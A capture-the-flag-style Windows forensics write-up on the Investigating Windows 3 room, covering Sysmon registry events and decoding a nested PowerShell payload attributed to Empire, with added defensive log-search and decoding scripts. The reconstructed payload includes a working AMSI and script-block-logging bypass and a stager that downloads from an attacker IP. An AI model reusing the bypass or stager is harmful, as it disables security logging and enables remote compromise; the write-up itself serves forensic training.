This is the third room in the Investigating Windows series (there’s also the 2.0 room, which I did, but as it was IMHO very poorly done and annoying I didn’t want to spend time writing a write-up for it). I think this room was good and definitely helps in practising some interesting steps of a Windows forensic analysis, but what I did notice is that I would probably have found some of the answers faster if I had known PowerShell well enough to search through the logs from the command line.
PowerShell is definitely something I need to pick up at some point, but for now I managed just fine without it.
Scenario
Not much of a scenario is provided in this room, just a list of questions to answer by looking at the provided logs (Autoruns and Process Monitor logs).
Investigation
- What is the registry key with the encoded payload? (full path)
I found this one by looking at the Autoruns logs: I noticed a PowerShell command with the -enc flag (run by a suspicious “Updater” entry with no Description and no Publisher).
- What is the rule name for this run key generated by Sysmon?
In Sysmon, Event IDs 12, 13 and 14 cover registry activity: 12 is a key being created or deleted, 13 is a value being set, and 14 is a key or value being renamed. A Run-key persistence entry like this one therefore shows up as a value set (ID 13) whose TargetObject is the Run key and whose Details field holds the command line.
Looking at events with ID 13 helped me find the needed answer (for this question and the next few ones).
- What tactics is classified with this MITRE ATT&CK ID?
- What was UTC time for the Sysmon event?
- What was the Sysmon Event ID? Event Type? (answer, answer)
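As an added example (not part of the original write-up), this is the kind of PowerShell query that pulls those answers out of an exported Sysmon log in one go: it filters the registry Event IDs, flattens each event's EventData into named fields, and keeps only the events that touch a Run key, so RuleName, UtcTime, EventType and the written Details (the command line) are all in one object. The .evtx path and the Run-key pattern are assumptions; drop -EvtxPath to query the live Sysmon channel instead.

```powershell
# Added example, not part of the original write-up: pull Sysmon registry events
# (12 = key create/delete, 13 = value set, 14 = key/value rename) and keep the
# ones that touch a Run key. The .evtx path and the key pattern are assumptions;
# drop -EvtxPath to query the live Sysmon channel instead.
function Get-SysmonRunKeyEvent {
    param(
        [string]$EvtxPath,                                    # exported Sysmon log (optional)
        [string]$LogName    = 'Microsoft-Windows-Sysmon/Operational',
        [string]$KeyPattern = 'CurrentVersion\\Run'           # regex tested against TargetObject
    )
    $filter = @{ Id = 12, 13, 14 }
    if ($EvtxPath) { $filter.Path = $EvtxPath } else { $filter.LogName = $LogName }

    Get-WinEvent -FilterHashtable $filter -ErrorAction Stop | ForEach-Object {
        # Sysmon puts everything interesting in <EventData><Data Name="...">;
        # flatten that into a hashtable so fields can be addressed by name.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($data.TargetObject -match $KeyPattern) {
            [pscustomobject]@{
                UtcTime      = $data.UtcTime        # Sysmon's own UTC stamp (TimeCreated is local time)
                EventId      = $_.Id
                EventType    = $data.EventType      # e.g. SetValue for ID 13
                RuleName     = $data.RuleName       # from the Sysmon config; often carries a MITRE technique tag
                Image        = $data.Image
                ProcessId    = $data.ProcessId
                TargetObject = $data.TargetObject
                Details      = $data.Details        # the value written; for a Run key, the command line
            }
        }
    }
}

# Usage: every Run-key write in the exported log, newest first
Get-SysmonRunKeyEvent -EvtxPath 'C:\case\Sysmon.evtx' | Sort-Object UtcTime -Descending | Format-List
```

The UtcTime field is taken from Sysmon's own EventData rather than from the record's TimeCreated, because the latter is rendered in the analysis machine's local time zone and the room explicitly asks for UTC.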
The next four questions are answered by decoding the payload of the PowerShell command (partly shown in one of the previous screenshots, the one of the Windows Registry screen):
- Decode the payload. What service will the payload attempt start?
- The payload attempts to open a local port. What is the port number?
- What process does the payload attempt to terminate?
- What DLL file does the payload attempt to remove? (full path)

The payload was Base64-encoded and contained a second Base64-encoded payload inside it. Decoding both strings and putting them back together gave an overall view of what the script does.
```powershell
# --- Outer (first) decoded payload ---

# Start the Fax service
sc.exe start Fax

# Local TCP endpoint the script talks to (the variables say "FTP", but this is
# a raw TcpClient sending lines, not an FTP session)
$FTPServer = "localhost"
$FTPPort   = "9299"

# Open the connection and wrap it in a line reader/writer
$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort)
$tcpStream     = $tcpConnection.GetStream()
$reader        = New-Object System.IO.StreamReader($tcpStream)
$writer        = New-Object System.IO.StreamWriter($tcpStream)
$writer.AutoFlush = $true

# Lines to send, each Base64 of UTF-16LE text. "DQA=" is a bare carriage return;
# the middle element is the second payload, decoded separately below.
$commands = @(
    "DQA=",
    "<second Base64-encoded payload>",
    "DQA="
)

while ($tcpConnection.Connected) {
    # Drain whatever the listener sends back
    while ($tcpStream.DataAvailable) { $reader.ReadLine() }
    if ($tcpConnection.Connected) {
        # Send the whole command list five times, one line per second
        For ($i = 0; $i -lt 5; $i++) {
            ForEach ($str in $commands) {
                Start-Sleep -Seconds 1
                $command = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($str))
                $writer.WriteLine($command) | Out-Null
            }
        }
        break
    }
}
$reader.Close()
$writer.Close()
$tcpConnection.Close()
```

```powershell
# --- Inner (second) decoded payload, sent as one line to the listener above ---

# Kill the Fax service process (FXSSVC) and remove ualapi.dll from System32
(Get-Process FXSSVC).Kill()
Remove-Item -Path 'C:\Windows\System32\ualapi.dll'

# The logging/AMSI bypass Empire's launcher ships with: on PowerShell 3+ blank
# out the cached ScriptBlockLogging policy and flip AmsiUtils.amsiInitFailed
# so AMSI is never consulted for this session
if ($PSVersionTable.PSVersion.Major -ge 3) {
    $field = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
    if ($field) {
        $cachedSettings = $field.GetValue($null)
        if ($cachedSettings['ScriptBlockLogging']) {
            $cachedSettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
            $cachedSettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
        }
        $settings = [Collections.Generic.Dictionary[String,System.Object]]::new()
        $settings.Add('EnableScriptBlockLogging', 0)
        $settings.Add('EnableScriptBlockInvocationLogging', 0)
        # Poison the cache for the policy key so the real GPO value is never re-read
        $cachedSettings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'] = $settings
    } else {
        # Older builds: clear the ScriptBlock 'signatures' set instead
        [ScriptBlock].GetField('signatures', 'NonPublic,Static').SetValue($null, (New-Object Collections.Generic.HashSet[String]))
    }
    $amsiUtils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    $amsiUtils.GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}

# Stager: fetch the next stage from the C2 over HTTP with an IE-looking User-Agent
[System.Net.ServicePointManager]::Expect100Continue = 0
$client = New-Object System.Net.WebClient
$userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
$client.Headers.Add('User-Agent', $userAgent)
$client.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$Script:Proxy = $client.Proxy
# UTF-16LE Base64 of the C2 base URL, http://34.245.128.161:9001
$server = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA=='))
$path = '/admin/get.php'
$client.Headers.Add('Cookie', 'RjMeek=ZmQLHacMBXrLcB+VElvLcwO26EY=')
$data = $client.DownloadData($server + $path)
# (the reconstruction in the write-up stops here)
```
(I think I may have missed a couple of strings while putting the two decoded payloads back together from my notes, but the point was not to provide the entire working code, just to show the information relevant to answering the questions and give an overall feel for what the script does.)
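The two-layer unwrapping above can be done in a few lines of PowerShell rather than by hand. The following is an added example, not code from the write-up or from the room: it decodes the argument after -enc as UTF-16LE (which is what -EncodedCommand expects), then keeps unwrapping any quoted Base64-looking literal it finds in the decoded script, which is exactly how the second payload and the C2 URL were nested here. The sample command line at the bottom is constructed at run time so that nothing is hand-typed; it uses a documentation IP and is not the room's real payload.

```powershell
# Added example, not part of the original write-up. Peels a "-enc" payload the
# way the nested one above was handled: decode the outer layer as UTF-16LE,
# then keep unwrapping Base64 string literals found inside the decoded script.
# $Sample at the bottom is constructed here for an offline run; it is not the
# room's real command line and uses a documentation IP.

function ConvertFrom-Base64Text {
    param([Parameter(Mandatory)][string]$Base64)
    try { $bytes = [Convert]::FromBase64String($Base64) } catch { return $null }
    if ($bytes.Length -lt 2) { return $null }
    # -EncodedCommand (and Empire's stager strings) are UTF-16LE, so for ASCII
    # content every odd byte is 0x00; fall back to UTF-8 otherwise.
    $zeroOdd = 0
    for ($i = 1; $i -lt $bytes.Length; $i += 2) { if ($bytes[$i] -eq 0) { $zeroOdd++ } }
    if ($zeroOdd -ge [math]::Floor($bytes.Length / 2) * 0.9) {
        return [Text.Encoding]::Unicode.GetString($bytes)
    }
    return [Text.Encoding]::UTF8.GetString($bytes)
}

function Expand-EncodedPayload {
    param(
        [Parameter(Mandatory)][string]$Text,
        [int]$Depth = 0,
        [int]$MaxDepth = 4          # guard against pathological self-referencing blobs
    )
    if ($Depth -ge $MaxDepth) { return }

    # Layer 0 is a command line: take the argument after -e / -enc / -EncodedCommand.
    # Deeper layers are scripts: take every quoted Base64-looking literal (>= 16 chars,
    # which skips short noise such as "DQA=", a bare carriage return).
    $flag = [regex]::Match($Text, '(?i)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})')
    if ($flag.Success) {
        $candidates = @($flag.Groups[1].Value)
    } else {
        $candidates = [regex]::Matches($Text, '[''"]([A-Za-z0-9+/]{16,}={0,2})[''"]') |
                      ForEach-Object { $_.Groups[1].Value }
    }

    foreach ($b64 in $candidates) {
        $decoded = ConvertFrom-Base64Text -Base64 $b64
        if (-not $decoded) { continue }
        [pscustomobject]@{ Depth = $Depth + 1; Decoded = $decoded }
        Expand-EncodedPayload -Text $decoded -Depth ($Depth + 1) -MaxDepth $MaxDepth
    }
}

# --- constructed sample: built at run time so no Base64 is hand-typed ---
function New-Utf16Base64([string]$s) { [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($s)) }
$inner  = "`$server = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('" + (New-Utf16Base64 'http://203.0.113.10:8080') + "'))"
$outer  = "`$commands = @('DQA=', '" + (New-Utf16Base64 $inner) + "', 'DQA=')"
$Sample = 'powershell.exe -w hidden -enc ' + (New-Utf16Base64 $outer)

Expand-EncodedPayload -Text $Sample | Format-List
# Depth 1 is the $commands array, depth 2 the stager line, depth 3 the C2 URL.
```

Feed it the Details field of the Sysmon ID 13 event (or the Autoruns command line) instead of $Sample to get the same three layers from the real artefact. The encoding check matters in practice: a stager that builds its strings with [Text.Encoding]::ASCII would be mangled if everything were blindly decoded as UTF-16LE.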
- What is the Windows Event ID associated with this service?
- What is listed as the New Default Printer?
To answer these I had to dig around the internet and these logs; this is probably one of those situations where being able to search through all the logs with PowerShell would have sped things up, for example with something like this (out of curiosity, I looked the command up after the investigation):

```powershell
# Lists the event log channels whose name contains "Print" (it does not search their contents)
Get-WinEvent -ListLog * | findstr "Print"
```
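Listing channel names only tells you where to look. The "search every log for a word" step the text wishes for is the following added example (not from the write-up); it walks either the live machine's non-empty channels or a folder of exported .evtx files and returns the channel, Event ID and provider of every record whose rendered message matches a pattern. The folder name and the search pattern are assumptions.

```powershell
# Added example, not part of the original write-up: keyword search across every
# event log. Assumes either the live machine's channels or a folder of exported
# .evtx files; the folder name and the search pattern are assumptions.
function Search-WinEventText {
    param(
        [Parameter(Mandatory)][string]$Pattern,   # regex tested against the rendered Message
        [string]$EvtxFolder,                      # optional: folder of exported .evtx files
        [int]$MaxPerLog = 10000                   # cap per channel so a busy log cannot stall the search
    )
    if ($EvtxFolder) {
        $sources = Get-ChildItem -Path $EvtxFolder -Filter *.evtx |
                   ForEach-Object { @{ Path = $_.FullName } }
    } else {
        # Only channels that actually hold records; skips the hundreds of empty ones
        $sources = Get-WinEvent -ListLog * -ErrorAction SilentlyContinue |
                   Where-Object { $_.RecordCount -gt 0 } |
                   ForEach-Object { @{ LogName = $_.LogName } }
    }
    foreach ($src in $sources) {
        Get-WinEvent -FilterHashtable $src -MaxEvents $MaxPerLog -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -match $Pattern } |
            Select-Object @{ n = 'UtcTime'; e = { $_.TimeCreated.ToUniversalTime() } },
                          ContainerLog,              # channel name, or the .evtx path when reading files
                          Id, ProviderName, ProcessId,
                          @{ n = 'Snippet'; e = { ($_.Message -split '\r?\n')[0] } }
    }
}

# Which channel and Event ID carry the printer change the room asks about?
Search-WinEventText -Pattern 'Default Printer' -EvtxFolder 'C:\case\logs' | Format-Table -AutoSize
```

Message rendering needs the provider's message DLLs, so on an analysis box that lacks the provider the Message property comes back empty and the match silently fails; in that case filter on Id and ProviderName with the XML fields instead, as in the Sysmon example earlier.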
- What process is associated with this event?
- What is the parent PID for the above process?
- Examine the other processes. What is the PID of the process running the encoded payload?
- Decode the payload. What is the visible partial path?
The answer to this can be found in the code above:
/admin/get.php
- This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)
Answering this question required digging around VirusTotal, starting with a search for the IP address shown in the code, checking the associated malicious file realm.ps1 and then investigating the framework used in this attack, Empire.
The answer was DefaultProfile, Empire (for some reason, they inverted the expected answers’ order).
- What other file paths are you likely to find in the logs? (answer, answer)
- What is the MITRE ATT&CK URI for the attack framework?
https://attack.mitre.org/software/S0363/
- What was the FQDN of the attacker machine that the suspicious process connected to?
ec2-34-245-128-161.eu-west-1.compute.amazonaws.com
(shown in a previous screenshot; it’s the resolved attacker IP address)
- What other process connected to the attacker machine?
- What is the PID for this process?
- What was the path for the first image loaded for the process identified in Q’s 19 & 20?
Finding the answers required searching for the malicious IP through the logs in Event Viewer, then searching for the corresponding PID in the Process Monitor logs. It was Explorer.
- What Sysmon event was generated between these 2 processes? What is its associated Event ID #? (answer, answer)
- What is the UTC time for the first event between these 2 processes?
- What is the value under Date and Time? (MM/DD/YYYY H:MM:SS [AM/PM])
- What is the first operation listed by the 2nd process starting with the Date and Time from Q25?
- What is the name of the last module in the stack from this event which had a successful result?
- Most likely what module within the attack framework was used between the 2 processes?
The answer to this was on the MITRE ATT&CK website:
- What is the MITRE ID for this technique?
Conclusion
I certainly enjoyed doing this room; I could practise my Windows forensics skills (also, I recently finished a course on Practical Windows Forensics that gave me enough knowledge and confidence to tackle this room faster than the previous ones). I recommend it to anyone who wants to hone their blue team skills and expand their knowledge of the Empire attack framework, which is widely used.